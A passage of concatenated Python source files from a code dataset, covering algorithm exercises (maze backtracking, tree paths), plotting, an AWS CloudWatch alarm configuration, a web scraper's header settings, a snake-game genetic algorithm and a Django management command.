'day_max_prev_month': day_max_prev_month})","repo_name":"MarkusDunkel/productivity_recording_app","sub_path":"app/zerf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23818915086","text":"'''\nProblem statement- given a maze of 1s with obstacles (represented by 0).\nWe have to print all the possible paths to the end.\nLogical intuition- We have to explore all the possible paths hence our mouse\nwill move in all four directions untill it reaches the end\n'''\n\n\ndef printPathHelper(i, j, maze, n, solution):\n '''\n Summary Line:\n This funcion helps us to print the path followed by the rat in the maze.\n It puts 1s at places that the mouse can go and 0s\n at places where the mouse doesn't go.\n\n Args:\n i- current position on the maze horizontally\n j- current position on the maze vertically\n maze- The 2D matrix that was inputted through which the Rat has to pass\n n- side of the 2D matrix\n solution- solution matrix to be returned\n '''\n if i == n-1 and j == n-1:\n print()\n solution[i][j] = 1\n for i in range(n):\n for j in range(n):\n print(solution[i][j], end=\" \")\n print()\n solution[i][j] = 0\n return\n if i < 0 or j < 0 or i >= n or j >= n or\\\n maze[i][j] == 0 or solution[i][j] == 1:\n return\n solution[i][j] = 1\n printPathHelper(i+1, j, maze, n, solution)\n printPathHelper(i, j+1, maze, n, solution)\n printPathHelper(i-1, j, maze, n, solution)\n printPathHelper(i, j-1, maze, n, solution)\n solution[i][j] = 0\n return\n\n\ndef printPath(maze):\n '''\n Summary Line:\n This function helps us to take form a solution matrix and calls\n another method printPathHelper() on the solution matrix\n to print all possible paths for the mouse.\n\n Args:\n maze- The 2D matrix that was inputted through which the Rat has to pass\n '''\n n = len(maze)\n solution = [[0 for j in range(n)]for i in range(n)]\n printPathHelper(0, 0, maze, n, solution)\n\nif __name__ == '__main__':\n n = int(input())\n maze = []\n for j in range(n):\n arr = [int(i) for i in input().split()]\n maze.append(arr)\n j += 1\n printPath(maze)\n\n'''\nSample input-\n4\n1 1 1 1\n1 1 0 1\n1 0 1 1\n1 1 1 1\n\nIllustration for the maze-\n(Obstacles at positions where there is 0 in the input matrix)\n 0 1 2 3\n +-------+-------+-------+-------+\n | | | | |\n 0 | | | | |\n | | | | |\n +---------------+-------+-------+\n | | | | |\n 1 | | | x | |\n | | | | |\n +-------+-------+-------+-------+\n | | | | |\n 2 | | x | | |\n | | | | |\n +-------+-------+-------+-------+\n | | | | |\n 3 | | | | |\n | | | | |\n +-------+-------+-------+-------+\n\nSample Output-\nAll possible paths will be printed\n\nTime complexity- O(2^(n^2))\n'''\n","repo_name":"HarshCasper/NeoAlgo","sub_path":"Python/backtracking/RatInMaze.py","file_name":"RatInMaze.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":873,"dataset":"github-code","pt":"3"} +{"seq_id":"33422887415","text":"from HSTB.kluster.gui.backends._qt import QtGui, QtCore, QtWidgets, Signal\nimport pyqtgraph.opengl as gl\nimport numpy as np\nimport sys\n\nfrom matplotlib import cm\n\n\n# open3d is nice, but kind of rigid in how it is built. Not very changeable. Also QT support might be coming but is\n# not there yet. They are using this im gui thing?\n# https://github.com/intel-isl/Open3D/issues/1161\n\n# this instead?\n# https://pyqtgraph.readthedocs.io/en/latest/how_to_use.html#embedding-widgets-inside-pyqt-applications\n\n# mayavi?\n# https://docs.enthought.com/mayavi/mayavi/auto/example_qt_embedding.html#example-qt-embedding\n\n# this has basic plotting and is good for dask\n# https://hvplot.holoviz.org/user_guide/index.html\n\n# holoviz for plots straight from dask\n# http://holoviews.org/user_guide/Dashboards.html\n\n# dash + datashader\n# https://github.com/plotly/plotly.py/issues/1266\n\n# https://doc.qt.io/qt-5/qtdatavisualization-scatter-example.html\n\n\nclass Kluster3dview(gl.GLViewWidget):\n \"\"\"\n Currently using pyqtgraph opengl widgets for 3d plotting. It is pretty basic, and I haven't spent much time on\n this. This is sort of a placeholder for what we might want eventually.\n\n Can plot points and surfaces.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.opts['distance'] = 20\n self.setWindowTitle('kluster 3dview')\n\n self.grid = gl.GLGridItem()\n self.addItem(self.grid)\n\n self.ptstore = []\n self.surfstore = []\n\n def add_point_dataset(self, x, y, z):\n \"\"\"\n Plot the provided xyz numpy arrays. Centers the data in the plot using translate.\n\n Store the plot object to self.ptstore so we can remove it later.\n\n Parameters\n ----------\n x: numpy array, x value\n y: numpy array, y value\n z: numpy array, z value\n\n \"\"\"\n pts = np.c_[x, y, -z]\n\n cmap = cm.get_cmap('viridis', 100)\n normz = (z/np.max(z) * 99).astype(np.int16)\n color = cmap.colors[normz]\n\n scatterplt = gl.GLScatterPlotItem(pos=pts, color=color, size=1)\n scatterplt.translate(-np.nanmean(x), -np.nanmean(y), -np.nanmean(z))\n scatterplt.setData()\n\n self.ptstore.append(scatterplt)\n self.addItem(self.ptstore[-1])\n\n def add_surface_dataset(self, x, y, z):\n \"\"\"\n Plot the provided xyz node locations as a surface. Centers the data in the plot using translate\n\n Store the plot object to self.ptstore so we can remove it later.\n\n Parameters\n ----------\n x: numpy array, x value\n y: numpy array, y value\n z: numpy array, z value\n\n \"\"\"\n surfplt = gl.GLSurfacePlotItem(x=x, y=y, z=z, shader='normalColor')\n surfplt.translate(-np.nanmean(x), -np.nanmean(y), -np.nanmean(z))\n surfplt.setData()\n\n self.surfstore.append(surfplt)\n self.addItem(self.surfstore[-1])\n\n def clear_plot_area(self):\n \"\"\"\n Clear all the plotted surfaces/points that were stored to the stores.\n \"\"\"\n for sf in self.surfstore:\n self.removeItem(sf)\n for pd in self.ptstore:\n self.removeItem(pd)\n self.ptstore = []\n self.surfstore = []\n\n\nif __name__ == '__main__':\n try: # pyside2\n app = QtWidgets.QApplication()\n except TypeError: # pyqt5\n app = QtWidgets.QApplication([])\n\n try:\n test_window_one = Kluster3dview()\n from HSTB.kluster.fqpr_convenience import reload_data\n fq = reload_data(r\"C:\\collab\\dasktest\\data_dir\\hassler_acceptance\\refsurf\\converted\", show_progress=False)\n test_window_one.add_point_dataset(fq.soundings.x.values, fq.soundings.y.values, fq.soundings.z.values)\n fq.client.close()\n test_window_one.show()\n\n test_window_two = Kluster3dview()\n from HSTB.kluster.fqpr_surface import BaseSurface\n surf = BaseSurface(from_file=r\"C:\\collab\\dasktest\\data_dir\\hassler_acceptance\\refsurf\\converted\\surf.npz\")\n x, y, z, valid = surf.return_surf_xyz()\n test_window_two.add_surface_dataset(x, y, z)\n test_window_two.show()\n\n except AttributeError: # cant find the folder, so use this test data\n # use some non-(0,0,0) centered data to test the translation\n test_window_one = Kluster3dview()\n test_window_one.add_point_dataset(np.array([2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007]),\n np.array([2001, 2004, 2005, 2006, 2007, 2008, 2009, 2010]),\n np.array([2002, 2007, 2008, 2009, 2010, 2011, 2012, 2013]))\n test_window_one.show()\n\n test_window_two = Kluster3dview()\n test_window_two.add_surface_dataset(np.array([2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007]),\n np.array([2001, 2004, 2005, 2006, 2007, 2008, 2009, 2010]),\n np.random.random((8,8)))\n test_window_two.show()\n\n sys.exit(app.exec_())\n","repo_name":"noaa-ocs-hydrography/kluster","sub_path":"HSTB/kluster/archive/kluster_3dview.py","file_name":"kluster_3dview.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"3"} +{"seq_id":"38397673892","text":"# open google.com\r\n# perform a search\r\n\r\nimport time\r\nfrom selenium import webdriver\r\n\r\n\r\nclass ChromeDriverWindows():\r\n def test(self):\r\n baseUrl = \"https://google.com\"\r\n driver = webdriver.Chrome(executable_path=\"D:\\\\IT materials\\\\Exercises&Homework\\\\Drivere\\\\chromedriver.exe\")\r\n driver.get(baseUrl)\r\n time.sleep(10)\r\n\r\n element = None\r\n element = driver.find_element_by_name(\"q\")\r\n if element is not None:\r\n print(\"We found element by name\")\r\n \r\n element.send_keys(\"selenium\")\r\n element.submit()\r\n \r\n\r\n\r\nincercare = ChromeDriverWindows()\r\nincercare.test()\r\n","repo_name":"razvitesting/Automation-Testing","sub_path":"SearchGoogle.py","file_name":"SearchGoogle.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30209900475","text":"from matplotlib import pyplot as plt\n\nmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n\nvisits_per_month = [9695, 7909, 10831, 12942, 12495, 16794, 14161, 12762, 12777, 12439, 10309, 8724]\n\n# numbers of limes of different species sold each month\nkey_limes_per_month = [92.0, 109.0, 124.0, 70.0, 101.0, 79.0, 106.0, 101.0, 103.0, 90.0, 102.0, 106.0]\npersian_limes_per_month = [67.0, 51.0, 57.0, 54.0, 83.0, 90.0, 52.0, 63.0, 51.0, 44.0, 64.0, 78.0]\nblood_limes_per_month = [75.0, 75.0, 76.0, 71.0, 74.0, 77.0, 69.0, 80.0, 63.0, 69.0, 73.0, 82.0]\n\n# create your figure here\nplt.figure(figsize=(12,8))\n\nax1 = plt.subplot(1,2,1)\n\nx_values = range(len(months))\nplt.plot(x_values,visits_per_month,marker='o')\nplt.xlabel(\"Months\")\nplt.ylabel(\"Page Visits\")\nax1.set_xticks(x_values)\nax1.set_xticklabels(months)\nplt.title(\"Page visit per month\")\nplt.margins(0.05,0.05)\n\nax2 = plt.subplot(1,2,2)\nplt.plot(x_values,key_limes_per_month,color=\"brown\",marker='s')\nplt.plot(x_values,persian_limes_per_month,color=\"yellow\",marker='^')\nplt.plot(x_values,blood_limes_per_month,color=\"red\",marker='p')\nplt.xlabel(\"Months\")\nplt.ylabel(\"Lime Sales\")\nax2.legend([\"Key Limes\",\"Persian Limes\",\"Blood Limes\"])\nax2.set_xticks(x_values)\nax2.set_xticklabels(months)\nplt.title(\"Lime Sales per month\")\nplt.margins(0.05,0.05)\n\nplt.savefig(\"Page_visits_and_Lime_sales.png\")\nplt.show()\n\n","repo_name":"arnobchanda/Sublimes-Limes-Project-Codecademy-","sub_path":"sublimeLimes.py","file_name":"sublimeLimes.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4970025739","text":"import sys\r\ninput = sys.stdin.readline\r\ndp=list(list([0]*21 for i in range(21)) for j in range(21))\r\nfor i in range(21):\r\n for j in range(21):\r\n for k in range(21):\r\n if i == 0 or j== 0 or k== 0:\r\n dp[k][j][i] = 1\r\nfor i in range(1,21):\r\n for j in range(1,21):\r\n for k in range(1,21):\r\n if i < j and j < k:\r\n dp[k][j][i] = dp[k-1][j][i] + dp[k-1][j-1][i] - dp[k][j-1][i]\r\n else:\r\n dp[k][j][i] = dp[k][j][i-1] + dp[k][j-1][i-1] + dp[k-1][j][i-1] - dp[k-1][j-1][i-1]\r\n\r\nwhile True:\r\n a , b, c = map(int, input().split())\r\n if (a,b,c) == (-1,-1,-1):\r\n break\r\n if a<=0 or b <=0 or c <= 0:\r\n result = 1\r\n elif a>20 or b>20 or c>20:\r\n result = dp[20][20][20]\r\n else:\r\n result = dp[c][b][a]\r\n\r\n print(f'w({a}, {b}, {c}) = {result}')\r\n","repo_name":"goeom77/algorithm","sub_path":"백준/Silver/9184. 신나는 함수 실행/신나는 함수 실행.py","file_name":"신나는 함수 실행.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1546540915","text":"# Given the root of a binary tree, return all root-to-leaf paths in any order.\n\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def binary_tree_paths(self, root: TreeNode) -> List[str]:\n \"\"\"Return all root-to-leaf paths in a binary tree using a recursive\n depth-first search algorithm in linear space and time.\"\"\"\n if not root:\n return []\n\n value = str(root.val)\n paths = []\n children = list(filter(None, [root.left, root.right]))\n for child in children:\n paths.extend(self.binary_tree_paths(child))\n for index, path in enumerate(paths):\n paths[index] = f\"{value}->{path}\"\n if not paths:\n paths.append(value)\n return paths\n","repo_name":"patricktsandin/leetcode","sub_path":"leetcode/easy/python/binary_tree_paths/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16847831029","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nimport numpy as np\nimport cv2 as cv\nfrom arguments import Arguments\nfrom components import Components\nfrom component_evaluation import eliminate_insiders, filter_neighbors, eliminate_tiny\n\n\ndef extract_mser(img, args):\n '''\n Function using mser module from the openCV library to extract maximally stable extremal regions.\n Additionally MSERs that lie inside others or have no neighbors are eliminated.\n\n Args:\n img (ndarray): image from which MSERs are to be extracted\n args (Arguments instance):\n\n Returns:\n an instance of the Components class\n '''\n # find MSERs\n mser = cv.MSER_create()\n mser.setMinArea(args.min_area)\n mser.setMaxArea(args.max_area)\n mser.setDelta(args.delta)\n msers, bboxes = mser.detectRegions(img)\n\n #bringing bboxes into the format [x_min, x_max, y_min, y_max]\n bboxes = [[box[1], box[1]+box[3], box[0], box[0]+box[2]] for box in bboxes]\n components = Components(regions=msers, boxes=bboxes, img=img.astype(np.float32)/np.max(img))\n\n #components.show_img()\n\n eliminate_insiders(components)\n\n filter_neighbors(components, args)\n\n eliminate_tiny(components, args.pixel_threshold_factor)\n\n return components\n\n\nif __name__ == '__main__':\n\n args = Arguments()\n\n img = cv.imread('data_test/2.jpg')\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n scaled = cv.resize(gray, None, fx=0.5, fy=0.5)\n print(np.min(scaled))\n print('scaled image:', scaled.shape)\n\n components = extract_mser(scaled, args)\n components.show_img()\n\n","repo_name":"lucasmllr/text_recogition_project","sub_path":"mser_extraction.py","file_name":"mser_extraction.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38792323789","text":"import os\nimport pybryt\n\n\ndef pybryt_reference(lecture, exercise):\n basename = os.path.join('pybryt-references',\n f'exercise-{lecture}_{exercise}')\n pyfilename = f'{basename}.py'\n pklfilename = f'{basename}.pkl'\n\n if os.path.isfile(pyfilename):\n pybryt.ReferenceImplementation.compile(pyfilename).dump(pklfilename)\n elif not os.path.isfile(pklfilename):\n raise FileNotFoundError('Reference pkl file does not exists.')\n\n return pklfilename\n","repo_name":"marijanbeg/pybryt-examples","sub_path":"examples/lecture.py","file_name":"lecture.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"38287876324","text":"import logging\nimport json\n\n\nclass BaseConfig(object):\n # AWS 区域, 限 cn-northwest-1, cn-north-1\n REGION_NAME = 'cn-north-1'\n\n # CloudWatch 需要的 IAM Role\n _assume_policy = {\n \"Version\": \"2008-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"ec2.amazonaws.com.cn\"\n },\n \"Action\": \"sts:AssumeRole\"\n }\n ]\n }\n CWA_ROLE_CONFIG = {\n 'Name': 'CloudWatchAgentServerRole',\n 'Assume_Policy': json.dumps(_assume_policy),\n 'Policy_List': [\n 'arn:aws-cn:iam::aws:policy/CloudWatchAgentServerPolicy',\n 'arn:aws-cn:iam::aws:policy/AmazonSSMManagedInstanceCore'\n ]\n }\n\n # 通过此 tag 选择被管理的 EC2\n MANAGE_TAG = {\n 'Key': 'Managed',\n 'Values': ['Yes']\n }\n\n # 存储在 SSM Parameter Store 中的 CloudWatch Agent 参数名称\n CWAC_PARAMETER_NAME = 'CloudWatch-Agent-Configure'\n\n # 允许 SSM Agent 失联分钟数\n SSMA_PING_TIMEOUT_IN_MINUTES = 10\n\n # CloudWatch Agent 参考设置\n CWA_CONFIG = {\n \"agent\": {\n \"metrics_collection_interval\": 60,\n \"run_as_user\": \"root\"\n },\n \"metrics\": {\n \"append_dimensions\": {\n \"InstanceId\": \"${aws:InstanceId}\"\n },\n \"metrics_collected\": {\n \"mem\": {\n \"measurement\": [\n \"mem_used_percent\"\n ],\n \"metrics_collection_interval\": 60\n },\n \"swap\": {\n \"measurement\": [\n \"swap_used_percent\"\n ],\n \"metrics_collection_interval\": 60\n }\n }\n },\n \"logs\": {\n \"logs_collected\": {\n \"files\": {\n \"collect_list\": [\n {\n \"file_path\": \"/var/log/messages\",\n \"log_group_name\": \"amazon-cloudwatch-agent\",\n \"log_stream_name\": \"messages.log\",\n \"timezone\": \"UTC\"\n },\n {\n \"file_path\": \"/opt/aws/amazon-cloudwatch-agent/logs/amazon-cloudwatch-agent.log\",\n \"log_group_name\": \"amazon-cloudwatch-agent\",\n \"log_stream_name\": \"amazon-cloudwatch-agent.log\",\n \"timezone\": \"Local\"\n }\n ]\n }\n },\n \"log_stream_name\": \"cw_agent_ec2_logs\",\n \"force_flush_interval\": 15\n }\n }\n\n # SNS 报警 Topic 名称\n SNS_TOPIC_NAME = 'CloudWatch-Alarms'\n\n # 存海外区域 AK/SK 的参数名\n AKSK_PARAMETER_NAME = 'Global-AccessKeySecretKey-Pair'\n\n # Amazon Connect 配置\n CONNECT_CONFIG = {\n 'Region_Name': 'ap-northeast-1',\n 'Instance_Id': '44f835ce-e848-4fc1-a251-022b6bcf87d2',\n 'Attribute_Name': 'alarm_content'\n }\n\n # Amazon Connect Contact Flow content\n CONTACT_FLOW_CONTENT = {\n \"Version\": \"2019-10-30\",\n \"StartAction\": \"c6ab0cc6-24e2-4519-a5a1-a99b0ab94d4e\",\n \"Actions\": [\n {\n \"Identifier\": \"806a6d97-dd49-4ce3-b3d8-34cf83dfb47a\",\n \"Parameters\": {\n \"SSML\": \"$.Attributes.{}\".format(CONNECT_CONFIG['Attribute_Name'])\n },\n \"Transitions\": {\n \"NextAction\": \"7cdafb0a-ab10-4e0d-aa95-e9c80dc12d05\",\n \"Errors\": [],\n \"Conditions\": []\n },\n \"Type\": \"MessageParticipant\"\n },\n {\n \"Identifier\": \"e14a0513-6ec4-4666-92e3-5abda0ceb063\",\n \"Type\": \"DisconnectParticipant\",\n \"Parameters\": {},\n \"Transitions\": {}\n },\n {\n \"Identifier\": \"7cdafb0a-ab10-4e0d-aa95-e9c80dc12d05\",\n \"Parameters\": {\"LoopCount\": \"2\"},\n \"Transitions\": {\n \"NextAction\": \"e14a0513-6ec4-4666-92e3-5abda0ceb063\",\n \"Errors\": [],\n \"Conditions\": [\n {\n \"NextAction\": \"e14a0513-6ec4-4666-92e3-5abda0ceb063\",\n \"Condition\": {\n \"Operator\": \"Equals\",\n \"Operands\": [\"DoneLooping\"]\n }\n },\n {\n \"NextAction\": \"806a6d97-dd49-4ce3-b3d8-34cf83dfb47a\",\n \"Condition\": {\n \"Operator\": \"Equals\",\n \"Operands\": [\"ContinueLooping\"]\n }\n }\n ]\n },\n \"Type\": \"Loop\"\n },\n {\n \"Identifier\": \"778d8127-cce4-4e3e-9d01-e6971b543bfe\",\n \"Parameters\": {\n \"SSML\": \"<speak>您好,我是知语,来自于<lang xml:lang=\\\"en-US\\\">Amazon Connect</lang></speak>\"\n },\n \"Transitions\": {\n \"NextAction\": \"7cdafb0a-ab10-4e0d-aa95-e9c80dc12d05\",\n \"Errors\": [],\n \"Conditions\": []\n },\n \"Type\": \"MessageParticipant\"\n },\n {\n \"Identifier\": \"c6ab0cc6-24e2-4519-a5a1-a99b0ab94d4e\",\n \"Parameters\": {\"TextToSpeechVoice\": \"Zhiyu\"},\n \"Transitions\": {\n \"NextAction\": \"778d8127-cce4-4e3e-9d01-e6971b543bfe\",\n \"Errors\": [],\n \"Conditions\": []\n },\n \"Type\": \"UpdateContactTextToSpeechVoice\"\n },\n {\n \"Identifier\": \"f5c4308e-a367-478f-91b6-a56115c81169\",\n \"Parameters\": {\n \"FlowLoggingBehavior\": \"Enabled\"\n },\n \"Transitions\": {\n \"NextAction\": \"c6ab0cc6-24e2-4519-a5a1-a99b0ab94d4e\",\n \"Errors\": [],\n \"Conditions\": []\n },\n \"Type\": \"UpdateFlowLoggingBehavior\"\n }\n ]\n }\n\n # Lambda 需要的 IAM role\n LAMBDA_ROLE_CONFIG = {\n 'Name': 'LambdaFunctionCalloutExecutionRole',\n 'Assume_Policy': json.dumps(\n {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"lambda.amazonaws.com\"\n },\n \"Action\": \"sts:AssumeRole\"\n }\n ]\n }\n ),\n 'Policy_List': [\n 'arn:aws-cn:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole',\n 'arn:aws-cn:iam::aws:policy/AWSXRayDaemonWriteAccess'\n ]\n }\n\n # Lambda Function 名称\n LAMBDA_FUNCTION_NAME = 'fun-connect-outbound'\n\n\nclass DevConfig(BaseConfig):\n DEBUG = True\n LOGLEVEL = logging.DEBUG\n\n\nclass TestConfig(BaseConfig):\n LOGLEVEL = logging.DEBUG\n\n\nclass ProdConfig(BaseConfig):\n LOGLEVEL = logging.ERROR\n\n\nconfig = DevConfig()\n","repo_name":"laolongju/cloudwatch_alarm_automation","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43359279359","text":"from execjs import get as execjs_get\nfrom time import ctime as t_ctime\nfrom os import makedirs as make_dir\n\n__APP_JS_PATH = \"./js/app.js\"\n__APP_JS_ERROR_PATH = \"../javascript/app.js\"\nDATA_ALBUMS = \"./data/albums/\"\nUNKNOWN_ERROR = \"unknown-error\"\nTIMED_OUT_TIME = 20\nTIMED_OUT = \"TIMED_OUT\"\nF_js_De = \"De\"\nF_js_encode_url = \"encode_url\"\nF_js_decode_url = \"decode_url\"\n\nnode = execjs_get()\nctx = None\ntry:\n with open(__APP_JS_PATH, \"r\", encoding=\"utf-8\") as fp:\n ctx = node.compile(fp.read())\nexcept FileNotFoundError:\n with open(__APP_JS_ERROR_PATH, 'r', encoding=\"utf-8\") as fp:\n ctx = node.compile(fp.read())\n\n_LoggerFlag = True\n__LoggerFilePath = f\"../data/log/{t_ctime()}.log\"\nmake_dir('/'.join(__LoggerFilePath.split('/')[:-1]), exist_ok=True)\nWriteLogToFile = False\nif WriteLogToFile:\n with open(__LoggerFilePath, 'w', encoding='utf-8') as fp:\n fp.write(f\"====== start time: [{t_ctime()}] =========\\n\")\n\n\ndef get_logger_file():\n return open(__LoggerFilePath, 'a+', encoding='utf-8')\n\n\ndef close_logger_file(logger_file_fp):\n logger_file_fp.close()\n\n\nTHE_URL = \"https://girlimg.epio.app/api/articles?lang=en-us&filter={\\\"where\\\":{\\\"tag\\\":\\\"all\\\",\\\"lang\\\":\\\"en-us\\\"},\\\"limit\\\":20,\\\"skip\\\":\"\n__ACCEPT = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n__ACCEPT_ENCODING = \"gzip,deflate,br\"\n__ACCEPT_LANGUAGE = \"zh-CN,zh;q=0.9,en;q=0.8,pl;q=0.7,de;q=0.6\"\n__CACHE_CONTROL = \"max-age=0\"\n__CONNECTION = \"keep-alive\"\n__SEC_FETCH_DEST = \"document\"\n__SEC_FETCH_MODE = \"navigate\"\n__SEC_FETCH_SITE = \"none\"\n__SEC_FETCH_USER = \"?1\"\n__UPGRADE_INSECURE_REQUESTS = \"1\"\n__USER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\"\n\npage_headers = {\n \"Accept\": __ACCEPT,\n \"Accept-Encoding\": __ACCEPT_ENCODING,\n \"Accept-Language\": __ACCEPT_LANGUAGE,\n \"Cache-Control\": __CACHE_CONTROL,\n \"Connection\": __CONNECTION,\n \"Host\": \"girlimg.epio.app\",\n \"Sec-Fetch-Dest\": __SEC_FETCH_DEST,\n \"Sec-Fetch-Mode\": __SEC_FETCH_MODE,\n \"Sec-Fetch-Site\": __SEC_FETCH_SITE,\n \"Sec-Fetch-User\": __SEC_FETCH_USER,\n \"Upgrade-Insecure-Requests\": __UPGRADE_INSECURE_REQUESTS,\n \"User-Agent\": __USER_AGENT\n}\nalbum_headers = {\n \"Accept\": \"*/*\",\n \"Content-Type\": \"application/json\",\n \"Referer\": None,\n \"Sec-Fetch-Dest\": \"empty\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Site\": \"same-origin\"\n}\nmypic_net_headers = {\n \"accept\": __ACCEPT,\n \"accept-encoding\": __ACCEPT_ENCODING,\n \"accept-language\": __ACCEPT_LANGUAGE,\n \"cache-control\": __CACHE_CONTROL,\n \"sec-fetch-dest\": __SEC_FETCH_DEST,\n \"sec-fetch-mode\": __SEC_FETCH_MODE,\n \"sec-fetch-site\": __SEC_FETCH_SITE,\n \"sec-fetch-user\": __SEC_FETCH_USER,\n \"upgrade-insecure-requests\": __UPGRADE_INSECURE_REQUESTS,\n \"user-agent\": __USER_AGENT\n}\nepio_headers = {\n \"User-Agent\": __USER_AGENT,\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"en-us\",\n \"Connection\": __CONNECTION,\n \"Accept-Encoding\": __ACCEPT_ENCODING,\n \"Host\": \"cdn1-images.epio.app\"\n}\npic_headers = {\n \"accept\": __ACCEPT,\n \"accept-encoding\": __ACCEPT_ENCODING,\n \"accept-language\": __ACCEPT_LANGUAGE,\n \"cache-control\": __CACHE_CONTROL,\n \"connection\": __CONNECTION,\n \"sec-fetch-dest\": __SEC_FETCH_DEST,\n \"sec-fetch-mode\": __SEC_FETCH_MODE,\n \"sec-fetch-site\": __SEC_FETCH_SITE,\n \"sec-fetch-user\": __SEC_FETCH_USER,\n \"upgrade-insecure-requests\": __UPGRADE_INSECURE_REQUESTS,\n \"Referer\": \"https://girlimg.epio.app/article/detail/{}\",\n \"user-agent\": __USER_AGENT\n}\n","repo_name":"YeungShaoFeng/libxib","sub_path":"cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8969668376","text":"import numpy as np\nfrom .genetic_neural_net import *\n\n## Code to import file at runtime from separate root folder\nimport sys\nsys.path.insert(1, '../')\nimport snake_game\nimport snake_utils\n\ndef get_button_direction(direction):\n button_direction = \"LEFT\"\n if direction.tolist() == [10, 0]:\n button_direction = \"RIGHT\"\n elif direction.tolist() == [-10, 0]:\n button_direction = \"LEFT\"\n elif direction.tolist() == [0, 10]:\n button_direction = \"DOWN\"\n else:\n button_direction = \"UP\"\n\n return button_direction\n\ndef run_snake_with_genetic(weights):\n total_steps_per_game = 2500\n maximum_score = 0\n\n snake_start, snake_body, food_position, score = snake_game.get_starting_positions()\n for _ in range(total_steps_per_game):\n is_front_blocked, is_left_blocked, is_right_blocked = snake_utils.get_blocked_directions(\n snake_body)\n\n food_direction_vector_normalized, snake_direction_vector_normalized = snake_utils.get_food_and_direction_vectors(\n snake_body, food_position)\n\n predicted_direction = np.argmax(np.array(feed_forward(np.array(\n [is_left_blocked, is_front_blocked, is_right_blocked, food_direction_vector_normalized[0],\n snake_direction_vector_normalized[0], food_direction_vector_normalized[1],\n snake_direction_vector_normalized[1]]).reshape(-1, 7), weights))) - 1\n\n updated_direction = np.array(snake_body[0]) - np.array(snake_body[1])\n if predicted_direction == -1:\n updated_direction = np.array([updated_direction[1], -updated_direction[0]])\n if predicted_direction == 1:\n updated_direction = np.array([-updated_direction[1], updated_direction[0]])\n\n button_direction = get_button_direction(updated_direction)\n\n dir, snake_body, food_position, score, has_snake_collided = snake_game.run_snake_game_with_iterations(button_direction, button_direction, snake_start, food_position, snake_body, True, score)\n \n if has_snake_collided:\n break\n\n if score > maximum_score:\n maximum_score = score\n return maximum_score\n","repo_name":"Rajpal02/AI-Algos---Snake-game","sub_path":"Genetic_Algo/run_snake_game.py","file_name":"run_snake_game.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6746999390","text":"from django.core.management.base import BaseCommand, CommandError\n\nfrom pages.models import Page\n\n\nclass Command(BaseCommand):\n help = \"\"\"Remove Published Pages without Drafts\"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument('page_list', nargs = '+', type = str)\n parser.add_argument(\n '--force',\n action = 'store_true',\n dest = 'force',\n help = 'Do not prompt the user before removing a matching lone Page.',\n )\n\n def handle(self, *args, **options):\n count = 0\n urls = str(options['page_list'][0]).split(', ')\n \n print(urls)\n for url in urls:\n qs = Page.objects.filter(url=url) \n lone_page = None \n if qs.count() == 1:\n lone_page = qs.first()\n elif qs.count() == 3:\n if qs[0].title == qs[1].title:\n lone_page = qs[2]\n elif qs[1].title == qs[2].title:\n lone_page = qs[0]\n elif qs[0].title == qs[2].title:\n lone_page = qs[1]\n else:\n self.stdout.write(\"%s has %s Entries. None Removed\" % (url, qs.count()))\n\n if lone_page: \n if options['force']: \n self.stdout.write(\"Deleting %s\" % lone_page)\n lone_page.delete()\n count += 1 \n else:\n rm = input(\"Would you like to delete \"+ lone_page.title+ \"?(Y/n)\")\n if rm == 